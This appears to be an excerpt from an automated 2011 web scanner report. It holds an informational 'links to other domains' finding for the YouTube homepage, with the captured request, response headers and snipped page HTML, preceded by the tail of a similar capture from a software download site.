<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
           <a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="64-bit download" style="vertical-align:middle;"/></a>

           <!-- AddThis Button END -->
           &nbsp;|&nbsp; <a href="http://www.addthis.com/feed.php?pub=kicko&amp;h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&amp;t1=" title="Subscribe using any feed reader!" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-rss-en.gif" width="125" height="16" border="0" alt="Latest 64-bit downloads RSS" style="vertical-align:middle;"/></a>
...[SNIP]...
<p style="padding-bottom:10px;">
                       <a href="http://www.liutilities.com/affcb/?id=DSgen&amp;aff=2736&amp;xat=gen" rel="nofollow" target="_blank" class="link01">
                           <img src="http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg" width="120" height="165" alt="FREE driver update scan!" border="0"/><br/>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

20.714. http://www.youtube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.youtube.com/?hl=en&tab=w1
The response contains the following links to other domains:
  • http://ad-g.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=us;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=5111726023253930?
  • http://code.google.com/apis/youtube/overview.html
  • http://s.ytimg.com/yt/cssbin/www-core-vfl1C7jty.css
  • http://s.ytimg.com/yt/favicon-vflZlzSbU.ico
  • http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif
  • http://s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js
  • http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&hl=en_US
  • http://www.google.com/support/youtube/bin/static.py?p=homepage&page=start.cs&hl=en_US
  • http://www.google.com/tools/feedback/intl/en/error.html
  • http://youtube-global.blogspot.com/
  • http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html
  • https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fhl%253Den%2526tab%253Dw1&ltmpl=sso&service=youtube&hl=en_US
  • https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&ltmpl=sso&service=youtube&hl=en_US
  • https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US
  • https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&hl=en_US&ltmpl=sso
  • https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso

Request

GET /?hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=3d11d5cb2b3e40e368f83f82e88170a4dAEAAAAx; GEO=5b80f4299f7903fea6e2637fc3585e04cwsAAAAzVVOtwdbzTTzh/A==;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
Set-Cookie: GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nUXNCUHlydnptdzgzNGFVaGlHd19GbmxTRkhJb2V0VTJfeFNPTEN0RmJYSHZKeURvdW5oZi1R -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vfl1C7jty.css">


<style type="text/css">
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="canonical" href="/">
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js"></script>
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
</span>
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
</a>
...[SNIP]...
<div id="ad_creative_1" class="ad-div mastad" style="z-index: 1;">
<iframe id="ad_creative_iframe_1" src="http://ad-g.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=us;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=5111726023253930?" height="250" width="970" scrolling="no" frameborder="0" style="z-index: 1" id="homepagetop" onload="yt.www.home.ads.workaroundLoad()" onmouseover="yt.www.home.ads.workaroundIE(this)" onfocus="yt.www.home.ads.workaroundIE(this)"></iframe>
...[SNIP]...
</span>
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">Sign In</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('REC')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="REC-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="REC-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
ointer; display:inline; float: right;" onclick="_hidediv('logged_out_rec_learn_more_box'); return false;" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/Rec_LearnMore_Close');"><img class="img-php-close-button master-sprite" style="background-position: -82px -712px;" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div style="color: black; padding-left: 5px; padding-right: 10px; margin-top: 10px;">
Remember, you will get better, more specific, and more consistent recommendations by <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&amp;service=youtube&amp;passive=true&amp;continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&amp;hl=en_US&amp;ltmpl=sso">logging in</a> (or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&amp;ltmpl=sso&amp;service=youtube&amp;hl=en_US">signing up</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('TOP')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="TOP-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="TOP-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="World of... Wait, What? No Really? Fondling 3D - 1/22/11" data-thumb="//i3.ytimg.com/vi/B7TICfqeck0/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/24');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="&quot;Pretty Eyes&quot; - Alex Goot" data-thumb="//i3.ytimg.com/vi/bxpiK1RqRHY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/10');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Incendie Imagix Mons" data-thumb="//i2.ytimg.com/vi/aJQPPwjPwNE/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/25');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Russisch für Anfänger" data-thumb="//i1.ytimg.com/vi/tbfQLn8Mmf0/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/1');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Kevin Muscat red card against Melbourne Heart" data-thumb="//i4.ytimg.com/vi/3gV6rVB0JmE/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/17');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Beach Waves: How to Scrunch Hair" data-thumb="//i2.ytimg.com/vi/IzXWIf-RGVk/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/26');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Fred Gets Kidnapped by Claudio" data-thumb="//i1.ytimg.com/vi/tVaZHc4RLuY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="More Gigabytes - Kanye West - All of the Lights (Official Music Video) PARODY" data-thumb="//i1.ytimg.com/vi/HgeDfXcEZwY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/15');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Kevin Muscat red card against Melbourne Heart" data-thumb="//i4.ytimg.com/vi/3gV6rVB0JmE/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmp');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="&quot;Pretty Eyes&quot; - Alex Goot" data-thumb="//i3.ytimg.com/vi/bxpiK1RqRHY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmf');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/HHu-xaE7xL0/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/K6BiXBBbp2s/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/hszZmFRPqx8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/0UjsXo9l6I8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/fA8fMUdmvkA/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/V84pW9AN6Og/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/_Psk6xbuT98/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/_1ZE5OXScTY/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/TzxoR25kf8I/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/fFAQb4WQ7lQ/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<h3><a href="http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html">Subscription Widget</a>
...[SNIP]...
<h3>
